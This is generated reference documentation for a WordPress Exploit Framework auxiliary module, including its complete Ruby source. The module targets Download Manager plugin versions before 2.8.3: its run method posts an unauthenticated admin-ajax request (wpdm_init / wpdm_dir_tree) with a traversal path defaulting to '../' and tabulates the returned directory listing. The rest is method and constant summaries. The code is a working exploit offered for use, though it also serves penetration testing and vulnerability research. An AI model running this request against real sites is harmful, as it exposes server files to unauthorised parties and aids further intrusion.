Class: Wpxf::Auxiliary::DownloadManagerDirectoryListingDisclosure
- Includes:
- ERB::Util, Wpxf
- Defined in:
- lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #encoded_remote_path ⇒ Object
-
#initialize ⇒ DownloadManagerDirectoryListingDisclosure
constructor
A new instance of DownloadManagerDirectoryListingDisclosure.
- #remote_path ⇒ Object
- #run ⇒ Object
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ DownloadManagerDirectoryListingDisclosure
Returns a new instance of DownloadManagerDirectoryListingDisclosure.
10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 10 def initialize super update_info( name: 'Download Manager Directory Listing Disclosure', desc: %( This module uses a lack of session and input validation in versions < 2.8.3 of the Download Manager plugin to get the directory listing of the specified directory. ), author: [ 'James Golovich', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8365'], ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities'] ], date: 'Jan 19 2016' ) ([ StringOption.new( name: 'remote_path', desc: 'The relative or absolute path to view the contents of', required: true, default: '../' ) ]) end |
Instance Method Details
#check ⇒ Object
41 42 43 |
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 41 def check check_plugin_version_from_readme('download-manager', '2.8.3') end |
#encoded_remote_path ⇒ Object
53 54 55 |
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 53 def encoded_remote_path url_encode(remote_path) end |
#remote_path ⇒ Object
45 46 47 48 49 50 51 |
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 45 def remote_path if datastore['remote_path'].end_with? '/' datastore['remote_path'] else "#{datastore['remote_path']}/" end end |
#run ⇒ Object
57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 |
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 57 def run return false unless super listing = [{ name: 'Name', type: 'Type' }] emit_info 'Requesting directory listing...' res = execute_post_request( url: wordpress_url_admin_ajax, params: { 'action' => 'wpdm_init', 'task' => 'wpdm_dir_tree' }, body: { 'dir' => encoded_remote_path } ) if res.nil? emit_error 'No response from the target' return false end if res.code != 200 emit_error "Server responded with code #{res.code}" return false end emit_info 'Parsing response...' begin doc = Nokogiri::HTML(res.body) items = doc.xpath("//ul//li") items.each do |item| if item['class'] =~ /directory/ listing.push(name: item.at('a').text, type: 'Directory') else listing.push(name: item.at('a').text, type: 'File') end end rescue StandardError => e emit_error "Could not parse the response: #{e}" return false end emit_table listing true end |